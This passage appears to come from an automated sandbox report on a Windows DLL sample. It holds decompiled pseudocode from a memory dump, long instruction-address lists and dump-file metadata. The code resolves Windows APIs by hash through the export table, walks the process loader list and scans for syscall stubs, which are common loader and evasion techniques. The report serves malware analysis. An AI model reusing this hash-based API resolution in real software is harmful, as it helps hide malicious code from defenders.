								if((( *(_t314 + 2) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
									goto L86;
								}
								goto L87;
							}
							if(_t427[2] == 1) {
								goto L86;
							}
							goto L85;
						}
						if(_t250 == 0x20 || _t250 == 0x22) {
							_t316 = 3;
							_t427[3] = _t316;
							if(_t427[2] > 4 || _t427[2] == 1) {
								goto L86;
							} else {
								goto L87;
							}
						} else {
							if(_t250 == 0x21 || _t250 == 0x23) {
								_t319 = 3;
								_t427[3] = _t319;
								if((_t427[6] & 0xfffffff0) == 0x20) {
									goto L86;
								}
								goto L87;
							} else {
								goto L66;
							}
						}
					}
					if(_t427[3] == 3) {
						L51:
						_t343 = _t343 | 0x00009000;
						 *(_t427[0x10] + 0x18) = _t343;
						goto L52;
					}
					_t412 = _t427[4];
					_t321 = _t250;
					_t427[8] = _t412 + 0x1b9;
					if(_t427[5] == 0) {
						_t413 = _t412 + 0x1a1;
						_t321 = _t250 & 0x000000fe;
					} else {
						_t413 = _t427[8];
						_t427[8] = _t412 + 0x1cb;
					}
					while(_t413 != _t427[8]) {
						if(_t321 ==  *_t413) {
							if((( *(_t413 + 1) & 0x000000ff) << _t427[2] & 0x00000080) == 0) {
								goto L52;
							}
							goto L51;
						}
						_t413 = _t413 + 2;
					}
					goto L51;
				}
			}

0x6eb69377
0x6eb6937b
0x6eb69387
0x6eb6938b
0x6eb6938f
0x6eb69394
0x6eb69397
0x6eb69399
0x6eb6939b
0x6eb6939b
0x6eb6939e
0x6eb693a4
0x6eb6941c
0x6eb69420
0x6eb69423
0x6eb69423
0x6eb69426
0x00000000
0x6eb69426
0x6eb693ab
0x6eb69413
0x6eb69417
0x00000000
0x6eb69417
0x6eb693b2
0x6eb6940b
0x6eb6940e
0x00000000
0x6eb6940e
0x6eb693b7
0x6eb693f5
0x6eb693fc
0x6eb693ff
0x6eb693c8
0x6eb693c8
0x6eb693ce
0x00000000
0x00000000
0x6eb693d3
0x6eb693ed
0x6eb693f0
0x00000000
0x6eb693f0
0x6eb693d8
0x00000000
0x6eb693da
0x6eb693de
0x6eb693e1
0x00000000
0x6eb693e1
0x6eb693d8
0x6eb69429
0x6eb69429
0x6eb69429
0x6eb69432
0x6eb6943b
0x6eb6943e
0x6eb69441
0x6eb69444
0x6eb69447
0x6eb6944d
0x6eb6948f
0x6eb69492
0x6eb69493
0x6eb6949a
0x6eb6949d
0x6eb6944f
0x6eb69453
0x6eb6945d
0x6eb69464
0x6eb69466
0x6eb6947f
0x6eb69482
0x6eb69482
0x6eb69464
0x6eb694a5
0x6eb694a8
0x6eb694ab
0x6eb694af
0x6eb694b3
0x6eb694bd
0x6eb694c1
0x6eb694cb
0x6eb694d4
0x6eb694e1
0x6eb694e4
0x6eb694e7
0x6eb694e7
0x6eb694f3
0x6eb694fe
0x6eb69504
0x6eb69508
0x6eb694f5
0x6eb694f5
0x6eb694f5
0x6eb69510
0x6eb6953a
0x6eb69540
0x6eb69540
0x6eb69548
0x6eb698f1
0x6eb698f7
0x6eb698fd
0x6eb698fd
0x00000000
0x6eb6954e
0x6eb6954e
0x6eb69552
0x6eb69555
0x6eb69558
0x6eb6955b
0x6eb6955f
0x6eb69561
0x6eb69564
0x6eb69567
0x6eb6956b
0x6eb69570
0x6eb69573
0x6eb69577
0x6eb6957c
0x6eb6957f
0x6eb69581
0x6eb69584
0x6eb69588
0x6eb6958d
0x6eb6959d
0x6eb695a3
0x6eb695a3
0x6eb695ab
0x6eb695ad
0x6eb695b6
0x6eb695b8
0x6eb695bb
0x6eb695c6
0x6eb695f3
0x6eb695c8
0x6eb695df
0x6eb695df
0x6eb695fb
0x6eb69601
0x6eb69607
0x6eb69607
0x6eb695fb
0x6eb695b6
0x6eb6960e
0x6eb6967f
0x6eb69684
0x6eb696dd
0x6eb6979f
0x6eb697a4
0x6eb697b3
0x6eb697b9
0x6eb697bd
0x6eb697c6
0x6eb697cd
0x6eb697d6
0x6eb697e4
0x6eb697e7
0x6eb697cf
0x6eb697cf
0x6eb697cf
0x6eb697cd
0x6eb697f0
0x6eb6981d
0x6eb69830
0x6eb69838
0x6eb6981f
0x6eb69821
0x6eb69829
0x6eb69829
0x6eb697f2
0x6eb697f7
0x6eb69816
0x6eb697f9
0x6eb697fe
0x6eb6980f
0x6eb69800
0x6eb69800
0x6eb69800
0x6eb697fe
0x6eb697f7
0x6eb69840
0x6eb6984f
0x6eb6985c
0x6eb69865
0x6eb69869
0x6eb6986d
0x6eb69870
0x6eb69873
0x6eb69876
0x6eb69879
0x6eb6987c
0x6eb69882
0x6eb69886
0x6eb6988c
0x6eb6988c
0x6eb69882
0x6eb69892
0x6eb698cf
0x6eb698d3
0x6eb698da
0x6eb698e0
0x6eb69894
0x6eb69897
0x6eb698b7
0x6eb698bb
0x6eb698c2
0x6eb698c9
0x6eb69899
0x6eb6989c
0x6eb6989e
0x6eb698a2
0x6eb698ac
0x6eb698b2
0x6eb698b2
0x6eb6989c
0x6eb69897
0x6eb698e7
0x6eb698e7
0x6eb69900
0x6eb69900
0x6eb69906
0x6eb6990b
0x6eb69965
0x6eb6996a
0x6eb699a9
0x6eb699ae
0x6eb699b0
0x6eb699b4
0x6eb699b7
0x6eb699ba
0x6eb699bc
0x6eb699bd
0x6eb699bd
0x6eb699c2
0x6eb699e0
0x6eb699e2
0x6eb699e6
0x6eb699ec
0x6eb699ef
0x6eb699f1
0x6eb699f2
0x6eb699f2
0x00000000
0x6eb699c4
0x6eb699c4
0x6eb699c4
0x6eb699c8
0x6eb699ce
0x6eb699d1
0x6eb699d3
0x6eb699d6
0x6eb699f5
0x6eb699f5
0x6eb699fc
0x6eb69a16
0x6eb699fe
0x6eb699fe
0x6eb69a0a
0x6eb69a0b
0x6eb69a0e
0x6eb69a0e
0x6eb69a24
0x6eb69a24
0x6eb699c2
0x6eb6996f
0x6eb6997d
0x6eb69995
0x6eb69999
0x6eb6999c
0x6eb699a2
0x6eb699a6
0x6eb699a6
0x00000000
0x6eb699a6
0x6eb6997f
0x6eb69983
0x6eb69989
0x6eb69989
0x6eb6998f
0x00000000
0x6eb6998f
0x6eb69971
0x6eb69975
0x00000000
0x6eb69975
0x6eb6990f
0x6eb6993b
0x6eb69953
0x6eb69957
0x6eb6995a
0x6eb6995d
0x6eb6995f
0x6eb69962
0x6eb6993d
0x6eb6993d
0x6eb69941
0x6eb69944
0x6eb69947
0x6eb6994a
0x6eb6994d
0x6eb6994d
0x00000000
0x6eb6993b
0x6eb69915
0x00000000
0x00000000
0x6eb6991b
0x6eb6991f
0x6eb69925
0x6eb69928
0x6eb6992b
0x6eb6992e
0x00000000
0x6eb6992e
0x6eb697a6
0x6eb697aa
0x6eb697b0
0x00000000
0x6eb697b0
0x6eb696e8
0x6eb696fa
0x6eb696ff
0x6eb6976a
0x00000000
0x00000000
0x6eb69771
0x6eb69797
0x6eb6979b
0x00000000
0x00000000
0x6eb6977a
0x6eb6977f
0x6eb69793
0x00000000
0x00000000
0x00000000
0x6eb69795
0x6eb69786
0x00000000
0x00000000
0x6eb6978b
0x00000000
0x00000000
0x6eb6978d
0x00000000
0x6eb69771
0x6eb69701
0x6eb6970b
0x6eb6971c
0x6eb6971f
0x6eb69722
0x6eb69728
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb6972e
0x6eb6972e
0x6eb6972e
0x6eb69735
0x00000000
0x00000000
0x6eb69737
0x6eb6973a
0x6eb69740
0x00000000
0x00000000
0x00000000
0x6eb69742
0x6eb69744
0x6eb6974d
0x00000000
0x00000000
0x6eb69761
0x00000000
0x00000000
0x00000000
0x6eb69763
0x6eb696ef
0x00000000
0x00000000
0x00000000
0x6eb696f5
0x6eb69689
0x6eb696b8
0x6eb696b9
0x6eb696c2
0x00000000
0x6eb696d3
0x00000000
0x6eb696d3
0x6eb69690
0x6eb69693
0x6eb696a6
0x6eb696a7
0x6eb696ab
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb69693
0x6eb69689
0x6eb69615
0x6eb69672
0x6eb69676
0x6eb6967c
0x00000000
0x6eb6967c
0x6eb69617
0x6eb6961b
0x6eb69628
0x6eb6962c
0x6eb69642
0x6eb6964a
0x6eb6962e
0x6eb69630
0x6eb6963a
0x6eb6963a
0x6eb69650
0x6eb69659
0x6eb69670
0x00000000
0x00000000
0x00000000
0x6eb69670
0x6eb6965b
0x6eb6965b
0x00000000
0x6eb69650

Strings

, xrefs: 6EB699DB

Memory Dump Source

Source File: 00000001.00000002.821591397.000000006EB51000.00000020.00020000.sdmp, Offset: 6EB50000, based on PE: true

Associated: 00000001.00000002.821578770.000000006EB50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821632398.000000006EB6A000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.821648077.000000006EB6D000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.821664567.000000006EB6F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction ID: 77f6824cc0b07d160d29564757cea6a4a86e28e838671e9f6fce12731604336f
Opcode Fuzzy Hash: 407fd4848e5b307e07d906eea16bb6147e298fc8bb87a15a6d3895badca8086c
Instruction Fuzzy Hash: 6F228C714083DACBE755CF99C4A136ABFE0FF86300F04886EE9E54B295D3359985CB92

Uniqueness

Uniqueness Score: -1.00%

Function 6EB6143C, Relevance: .6, Instructions: 572
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E6EB6143C(signed char __eax, signed char __edx) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed char _t231;
				signed char _t233;
				signed char _t238;
				intOrPtr _t241;
				void* _t246;
				signed char _t257;
				signed char _t261;
				signed char _t269;
				signed char _t270;
				signed char _t277;
				signed int _t279;
				signed char _t280;
				signed char _t281;
				void* _t289;
				void* _t290;
				signed char _t315;
				void* _t319;
				signed char _t334;
				signed char _t336;
				void* _t341;
				void* _t347;
				intOrPtr _t352;
				signed char _t354;
				signed char _t363;
				void* _t369;
				intOrPtr _t371;
				signed short* _t373;
				void _t375;
				void* _t379;
				signed int _t381;
				void* _t382;
				void** _t383;
				void* _t384;
				char* _t387;
				signed char _t395;
				signed char* _t396;
				intOrPtr _t400;
				signed int _t451;
				intOrPtr* _t455;
				signed char _t456;
				signed int _t462;
				void* _t467;
				signed char _t471;
				signed char _t472;
				signed char* _t477;
				signed char _t487;
				signed int _t490;
				intOrPtr* _t496;
				intOrPtr _t497;
				signed char _t498;
				signed char _t499;
				intOrPtr _t500;
				signed char _t508;
				intOrPtr _t510;
				void* _t513;
				signed char _t519;
				intOrPtr* _t524;
				signed char _t525;
				signed char _t526;
				signed char _t527;
				signed char _t529;
				signed char* _t531;
				signed char _t532;
				void* _t533;
				void* _t534;
				signed char* _t535;

				_t535[0x54] = __edx;
				 *_t535 = __eax;
				_t231 = E6EB60304(__edx, 1);
				if(_t231 != 0) {
					return _t231;
				}
				_t535[0x2c] = _t231;
				if( *0x6eb6d208 == 0 ||  *0x6eb6d2e4 != 0) {
					L44:
					if( *_t535 == 0) {
						return 0;
					}
					_t233 =  *_t535;
					_t371 =  *((intOrPtr*)(_t233 + 0x3c));
					_t510 =  *((intOrPtr*)(_t371 + _t233 + 0x78));
					_t535[0x130] =  *((intOrPtr*)(_t371 + _t233 + 0x7c)) + _t510;
					_t524 =  *((intOrPtr*)(_t510 + _t233 + 0x20)) + _t233;
					_t373 =  *((intOrPtr*)(_t510 + _t233 + 0x24)) + _t233;
					if( *((intOrPtr*)(_t510 + _t233 + 0x18)) <= 0) {
						L77:
						 *_t535 = 0;
						_t535[0x2c] = 0;
						L78:
						return  *_t535;
					}
					_t535[0x12c] = 0;
					_t535[0x174] = _t535[0x54] ^ 0xe462d21c;
					do {
						_t467 = 0;
						_t387 =  *_t524 +  *_t535;
						_t238 =  *_t387;
						_t535[0x58] = _t238;
						if(_t238 == 0) {
							L49:
							if(E6EB64FFC( &(_t535[0x58]), _t467) == _t535[0x174]) {
								_t535[0x2c] = 0;
								_t241 =  *((intOrPtr*)( *((intOrPtr*)(_t510 +  *_t535 + 0x1c)) +  *_t535 + ( *_t373 & 0x0000ffff) * 4));
								__eflags = _t241 - _t510;
								if(_t241 < _t510) {
									L57:
									_t471 =  *_t535 + _t241;
									__eflags = _t471;
									 *_t535 = _t471;
									_t535[0x2c] = _t471;
									L58:
									__eflags =  *_t535;
									if( *_t535 == 0) {
										goto L78;
									}
									__eflags =  *0x6eb6d2f0 |  *0x6eb6d2f1;
									if(( *0x6eb6d2f0 |  *0x6eb6d2f1) == 0) {
										_t525 =  *0x6eb6d208; // 0x2981340
										__eflags = _t525;
										if(_t525 == 0) {
											 *0x6eb6d2f0 = 1;
											_t526 = E6EB6361C(0x1c4);
											__eflags = _t526;
											if(_t526 == 0) {
												_t526 = 0;
												__eflags = 0;
											} else {
												E6EB61C30(_t526, 0x10);
												 *(_t526 + 0x1c0) = 0;
											}
											 *0x6eb6d208 = _t526;
											 *0x6eb6d2f0 = 0;
											L68:
											_t246 = 0;
											_t472 = 0;
											__eflags = 0;
											while(1) {
												__eflags =  *(_t472 + _t526 + 8);
												if( *(_t472 + _t526 + 8) == 0) {
													break;
												}
												_t246 = _t246 + 1;
												_t472 = _t472 + 0x1c;
												__eflags = _t246 - 0x10;
												if(_t246 < 0x10) {
													continue;
												}
												_t375 = E6EB6361C(0x1c4);
												__eflags = _t375;
												if(_t375 == 0) {
													_t375 = 0;
													__eflags = 0;
												} else {
													E6EB61C30(_t375, 0x10);
													 *(_t375 + 0x1c0) = 0;
												}
												 *(_t375 + 0x14) = _t535[0x2c];
												E6EB5DFC0(_t375,  &(_t535[0x58]));
												 *(_t375 + 8) = _t535[0x54];
												 *(_t526 + 0x1c0) = _t375;
												L76:
												 *_t535 = _t535[0x2c];
												goto L78;
											}
											_t527 = _t526 + _t472;
											__eflags = _t527;
											 *((intOrPtr*)(_t527 + 0x14)) =  *((intOrPtr*)( &(_t535[0x58]) - 0x2c));
											E6EB5DFC0(_t527,  &(_t535[0x58]));
											 *(_t527 + 8) = _t535[0x54];
											goto L76;
										}
										_t257 =  *(_t525 + 0x1c0);
										while(1) {
											__eflags = _t257;
											if(_t257 == 0) {
												goto L68;
											}
											_t526 = _t257;
											_t257 =  *(_t257 + 0x1c0);
										}
										goto L68;
									}
									__eflags = _t535[0x54] - 0x1c6ef387;
									if(_t535[0x54] == 0x1c6ef387) {
										 *0x6eb6d20c =  *_t535;
									} else {
										__eflags = _t535[0x54] - 0x45b68b68;
										if(_t535[0x54] == 0x45b68b68) {
											 *0x6eb6d210 =  *_t535;
										}
									}
									goto L78;
								}
								__eflags = _t241 - _t535[0x130];
								if(_t241 >= _t535[0x130]) {
									goto L57;
								}
								_t535[0x130] =  &(_t535[0x58]);
								_t261 = E6EB5E8A8( &(_t535[0x58]), 0x7fffffff);
								_t477 =  &(_t535[0x12c]);
								 *_t477 = _t261;
								_t477[2] = _t261 + 1;
								_t395 = E6EB6306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
								__eflags = _t395;
								if(_t395 != 0) {
									_t202 =  &(_t535[0x12c]); // 0x100
									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
								}
								 *_t535 = _t535[0x2c];
								goto L58;
							}
							goto L50;
						} else {
							goto L48;
						}
						do {
							L48:
							_t467 = _t467 + 1;
							_t270 =  *((intOrPtr*)(_t467 + _t387));
							_t535[_t467 + 0x58] = _t270;
						} while (_t270 != 0);
						goto L49;
						L50:
						_t524 = _t524 + 4;
						_t396 =  &(_t535[0x12c]);
						_t373 =  &(_t373[1]);
						_t269 =  *_t396 + 1;
						 *_t396 = _t269;
					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
					goto L77;
				} else {
					_t535[0x30] = 0;
					 *0x6eb6d2e4 = 1;
					E6EB5F584( &(_t535[0x38]), 0);
					E6EB5F584( &(_t535[0x168]), 0x1c);
					_t535[0x58] = E6EB5F4BC( &(_t535[0x168]), 0);
					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
					_t535[0x48] =  *(_t400 + 0xc);
					_t535[0x60] =  *(_t400 + 0x10);
					goto L5;
					L6:
					_t384 = 0;
					do {
						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
							goto L13;
						}
						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
						_t496 = E6EB6306C(0x60a28c5c, 0xe7942190, _t279, _t279);
						if(_t496 == 0) {
							L10:
							_t456 = _t535[0x50];
							_t497 =  *((intOrPtr*)(_t529 + 0xc));
							_t498 = _t497 + _t456;
							_t500 =  *((intOrPtr*)(_t529 + 8));
							_t535[0x28] = _t498;
							_t499 = _t498 + _t500;
							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
							_t535[0x24] = _t529;
							_t535[0x20] =  *(_t535[0x48] + 0x30);
							if((_t499 & 0x00000003) == 0) {
								L12:
								_t535[0x1c] = _t363;
								_t535[0x18] = _t499;
								E6EB5F828( &(_t535[0xc]), E6EB5F4CC( &(_t535[8])) + 0x14);
								_t369 = E6EB5F4BC( &(_t535[0xc]), E6EB5F4CC( &(_t535[8])) + 0xffffffec);
								_t462 = 5;
								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
								_t535 =  &(_t535[0xc]);
								_t535[4] = _t535[4] + 1;
								goto L13;
							} else {
								goto L11;
							}
							do {
								L11:
								_t499 = _t499 + 1;
								_t363 = _t363 - 1;
							} while ((_t499 & 0x00000003) != 0);
							goto L12;
						}
						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
						if(0 < 0) {
							goto L13;
						}
						goto L10;
						L13:
						_t384 = _t384 + 1;
						_t529 = _t529 + 0x28;
					} while (_t384 < _t535[0x5c]);
					L14:
					_t280 = _t535[4];
					_t535[0x44] = _t280;
					if(_t280 <= 1) {
						L21:
						if(_t535[0x44] <= 0) {
							L24:
							_t281 = _t535[0x48];
							_t556 = _t281 - _t535[0x60];
							if(_t281 != _t535[0x60]) {
								_t535[0x48] =  *_t281;
								E6EB5F654( &(_t535[8]));
								L5:
								_t277 =  *(_t535[0x48] + 0x18);
								_t535[0x50] = _t277;
								_t535[4] = 0;
								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
								E6EB5F584( &(_t535[0xc]), 0);
								_t279 =  *(_t379 + 6) & 0x0000ffff;
								_t535[0x5c] = _t279;
								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
								if(_t279 <= 0) {
									goto L14;
								}
								goto L6;
							}
							E6EB5F654( &(_t535[8]));
							E6EB5F654( &(_t535[0x164]));
							E6EB5F584( &(_t535[0x48]), 0);
							_t535[0x18] = 0;
							E6EB5F584( &(_t535[0x20]), 0);
							_push(0x60a28c5c);
							_t289 = E6EB61D34(0x60a28c5c);
							_t290 = E6EB612EC( &(_t535[0x154]), _t517, _t556);
							_push(_t290);
							_push(_t290);
							E6EB61C6C( &(_t535[0x164]), 0x60a28c5c);
							_t518 =  &(_t535[0x178]);
							E6EB5D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
							_push(0x80);
							_push(0);
							E6EB65CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
							E6EB65D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
							_push(_t289);
							E6EB68E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
							E6EB5F654( &(_t535[0x180]));
							_t557 = _t535[0x114];
							if(_t535[0x114] != 0) {
								E6EB5BB44( &(_t535[0x110]));
							}
							E6EB5CFDC( &(_t535[0x104]));
							E6EB5CFDC(_t518);
							E6EB5CFDC( &(_t535[0x15c]));
							E6EB5CFDC( &(_t535[0x154]));
							E6EB690EC( &(_t535[0xdc]), 0xffffffff);
							_t535[0x118] = _t535[0xf0];
							E6EB5F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
							_push(1);
							E6EB690B0( &(_t535[0x11c]));
							_t381 = 0;
							_t535[0x64] = 0;
							_t535[0x60] = 0;
							do {
								_t535[0x58] = E6EB5F4BC( &(_t535[0x38]), _t535[0x60]);
								_t535[0x70] = E6EB5F4CC( &(_t535[0x44]));
								_t519 =  *(0x6eb6bd40 + _t381 * 4);
								_t531 = E6EB6907C( &(_t535[0xf4]), _t519, _t519);
								if(_t531 == 0) {
									goto L42;
								}
								_t508 = E6EB687E8( &(_t535[0x11c]), _t519,  *_t531);
								_t532 =  *_t531;
								while(_t532 ==  *_t508) {
									_t508 = _t508 + 8;
									__eflags = _t508;
								}
								_t315 =  *_t508;
								_t535[0x74] = _t315;
								_t535[0x78] = _t315 - _t532;
								if(_t381 != 0) {
									L38:
									_t535[0x68] = E6EB5F4CC( &(_t535[0x44]));
									_t535[0x6c] = _t519;
									E6EB5F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
									_t319 = E6EB5F4CC( &(_t535[0x44]));
									_t487 = _t535[0x58];
									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
										E6EB5F828( &(_t535[0x20]), E6EB5F4CC( &(_t535[0x1c])) + 8);
										E6EB5F4BC( &(_t535[0x20]), E6EB5F4CC( &(_t535[0x1c])) + 0xfffffff8);
										asm("movsd");
										asm("movsd");
										_t535[0x18] = _t535[0x18] + 1;
										__eflags = _t381 - 0x1d;
										if(__eflags == 0) {
											_t228 =  &(_t535[0x44]); // 0x2c
											E6EB6317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
										}
										goto L42;
									}
									E6EB5F828( &(_t535[0x48]), _t535[0x70]);
									E6EB6317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
									E6EB5F840( &(_t535[0x44]), _t563);
									E6EB5F840( &(_t535[0x1c]), _t563);
									_t381 = _t381 - 1;
									_t334 = _t535[0x64] + 1;
									_t535[0x60] = _t535[0x60] + 0x14;
									_t535[0x18] = 0;
									_t535[0x64] = _t334;
									if(_t334 == _t535[0x30]) {
										break;
									}
									goto L42;
								}
								E6EB6913C( &(_t535[0x134]), _t519);
								_t535[0x5c] = _t532;
								while(1) {
									_t336 = _t535[0x5c];
									_t562 =  *_t336 - 0xb8;
									if( *_t336 == 0xb8) {
										break;
									}
									_t490 = _t535[0x5c] + E6EB69104( &(_t535[0x138]), __eflags, _t535[0x74]);
									_t535[0x5c] = _t490;
									__eflags = _t490 -  *_t508;
									if(__eflags < 0) {
										continue;
									}
									L37:
									E6EB5F654( &(_t535[0x144]));
									E6EB5F654( &(_t535[0x134]));
									goto L38;
								}
								 *0x6eb6d2ec =  *((intOrPtr*)(_t336 + 1));
								goto L37;
								L42:
								_t381 = _t381 + 1;
							} while (_t381 < 0x1e);
							E6EB5F654( &(_t535[0x11c]));
							E6EB68E68(_t381,  &(_t535[0xd8]));
							E6EB5F654( &(_t535[0x1c]));
							E6EB5F654( &(_t535[0x44]));
							E6EB5F654( &(_t535[0x34]));
							goto L44;
						}
						_t533 = 0;
						_t382 = 0;
						do {
							_t341 = E6EB5F4BC( &(_t535[0xc]), _t382);
							_t517 = _t341;
							E6EB5F828( &(_t535[0x38]), E6EB5F4CC( &(_t535[0x34])) + 0x14);
							_t347 = E6EB5F4BC( &(_t535[0x38]), E6EB5F4CC( &(_t535[0x34])) + 0xffffffec);
							_t451 = 5;
							memcpy(_t347, _t341, _t451 << 2);
							_t535 =  &(_t535[0xc]);
							_t533 = _t533 + 1;
							_t382 = _t382 + 0x14;
							_t535[0x30] = _t535[0x30] + 1;
						} while (_t533 < _t535[0x44]);
						goto L24;
					}
					_t535[0x4c] = 1;
					_t534 = 0x14;
					do {
						_t62 = _t534 - 0x14; // 0x0
						_t383 = E6EB5F4BC( &(_t535[0xc]), _t62);
						_t455 = E6EB5F4BC( &(_t535[0xc]), _t534);
						_t517 =  *_t383;
						_t352 =  *_t455;
						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
						}
						_t534 = _t534 + 0x14;
						_t354 = _t535[0x4c] + 1;
						_t535[0x4c] = _t354;
					} while (_t354 < _t535[0x44]);
					_t535[0x44] = _t535[4];
					goto L21;
				}
			}

0x6eb61448
0x6eb6144f
0x6eb61452
0x6eb61459
0x6eb61bdb
0x6eb61bdb
0x6eb6145f
0x6eb6146a
0x6eb619a9
0x6eb619ad
0x00000000
0x6eb61c2c
0x6eb619b3
0x6eb619b6
0x6eb619b9
0x6eb619c3
0x6eb619d2
0x6eb619d4
0x6eb619db
0x6eb61bc5
0x6eb61bc7
0x6eb61bca
0x6eb61bce
0x00000000
0x6eb61bce
0x6eb619ea
0x6eb619f5
0x6eb619fc
0x6eb619ff
0x6eb61a01
0x6eb61a04
0x6eb61a07
0x6eb61a0d
0x6eb61a1b
0x6eb61a2b
0x6eb61a50
0x6eb61a61
0x6eb61a64
0x6eb61a66
0x6eb61aca
0x6eb61acd
0x6eb61acd
0x6eb61acf
0x6eb61ad2
0x6eb61ad6
0x6eb61ad6
0x6eb61ada
0x00000000
0x00000000
0x6eb61ae7
0x6eb61aed
0x6eb61b21
0x6eb61b27
0x6eb61b29
0x6eb61bf8
0x6eb61c00
0x6eb61c03
0x6eb61c05
0x6eb61c1c
0x6eb61c1c
0x6eb61c07
0x6eb61c0b
0x6eb61c10
0x6eb61c10
0x6eb61c1e
0x6eb61c24
0x6eb61b43
0x6eb61b43
0x6eb61b45
0x6eb61b45
0x6eb61b47
0x6eb61b47
0x6eb61b4c
0x00000000
0x00000000
0x6eb61b4e
0x6eb61b4f
0x6eb61b52
0x6eb61b55
0x00000000
0x00000000
0x6eb61b61
0x6eb61b64
0x6eb61b66
0x6eb61b7d
0x6eb61b7d
0x6eb61b68
0x6eb61b6c
0x6eb61b71
0x6eb61b71
0x6eb61b8a
0x6eb61b8d
0x6eb61b96
0x6eb61b99
0x6eb61bbc
0x6eb61bc0
0x00000000
0x6eb61bc0
0x6eb61ba1
0x6eb61ba1
0x6eb61bad
0x6eb61bb0
0x6eb61bb9
0x00000000
0x6eb61bb9
0x6eb61b2f
0x6eb61b3f
0x6eb61b3f
0x6eb61b41
0x00000000
0x00000000
0x6eb61b37
0x6eb61b39
0x6eb61b39
0x00000000
0x6eb61b3f
0x6eb61aef
0x6eb61af7
0x6eb61b17
0x6eb61af9
0x6eb61af9
0x6eb61b01
0x6eb61b0a
0x6eb61b0a
0x6eb61b01
0x00000000
0x6eb61af7
0x6eb61a68
0x6eb61a6f
0x00000000
0x00000000
0x6eb61a7c
0x6eb61a82
0x6eb61a87
0x6eb61a8e
0x6eb61a92
0x6eb61aa7
0x6eb61aa9
0x6eb61aab
0x6eb61ab1
0x6eb61abf
0x6eb61abf
0x6eb61ac5
0x00000000
0x6eb61ac5
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb61a0f
0x6eb61a0f
0x6eb61a0f
0x6eb61a10
0x6eb61a13
0x6eb61a17
0x00000000
0x6eb61a2d
0x6eb61a30
0x6eb61a33
0x6eb61a3c
0x6eb61a3f
0x6eb61a40
0x6eb61a42
0x00000000
0x6eb6147d
0x6eb6147f
0x6eb61484
0x6eb6148f
0x6eb6149d
0x6eb614b0
0x6eb614bd
0x6eb614c6
0x6eb614ca
0x6eb614ce
0x6eb61516
0x6eb61516
0x6eb61518
0x6eb6151f
0x00000000
0x00000000
0x6eb61538
0x6eb61540
0x6eb61544
0x6eb61559
0x6eb6155d
0x6eb61561
0x6eb6156a
0x6eb61570
0x6eb61573
0x6eb61577
0x6eb6157f
0x6eb61581
0x6eb61585
0x6eb6158c
0x6eb61595
0x6eb61595
0x6eb61599
0x6eb615ae
0x6eb615c4
0x6eb615d1
0x6eb615d2
0x6eb615d2
0x6eb615d4
0x00000000
0x00000000
0x00000000
0x00000000
0x6eb6158e
0x6eb6158e
0x6eb6158e
0x6eb6158f
0x6eb61590
0x00000000
0x6eb6158e
0x6eb61553
0x6eb61557
0x00000000
0x00000000
0x00000000
0x6eb615d8
0x6eb615d8
0x6eb615d9
0x6eb615dc
0x6eb615e6
0x6eb615e6
0x6eb615ea
0x6eb615f1
0x6eb6164c
0x6eb61651
0x6eb616a4
0x6eb616a4
0x6eb616a8
0x6eb616ac
0x6eb614d6
0x6eb614d9
0x6eb614de
0x6eb614e4
0x6eb614e7
0x6eb614ee
0x6eb614f2
0x6eb614f9
0x6eb61502
0x6eb61506
0x6eb6150a
0x6eb61510
0x00000000
0x00000000
0x00000000
0x6eb61510
0x6eb616b6
0x6eb616c2
0x6eb616cd
0x6eb616d4
0x6eb616dd
0x6eb616e7
0x6eb616e8
0x6eb616f6
0x6eb616fb
0x6eb616fc
0x6eb61709
0x6eb6170e
0x6eb61720
0x6eb61725
0x6eb6172a
0x6eb6173c
0x6eb6174e
0x6eb61753
0x6eb6175e
0x6eb61765
0x6eb6176a
0x6eb61772
0x6eb6177b
0x6eb6177b
0x6eb61787
0x6eb6178e
0x6eb6179a
0x6eb617a6
0x6eb617b4
0x6eb617c5
0x6eb617cc
0x6eb617d1
0x6eb617da
0x6eb617df
0x6eb617e1
0x6eb617e5
0x6eb617e9
0x6eb617f6
0x6eb61803
0x6eb61807
0x6eb6181b
0x6eb6181f
0x00000000
0x00000000
0x6eb61834
0x6eb61836
0x6eb6183e
0x6eb6183b
0x6eb6183b
0x6eb6183b
0x6eb61842
0x6eb61844
0x6eb6184a
0x6eb61850
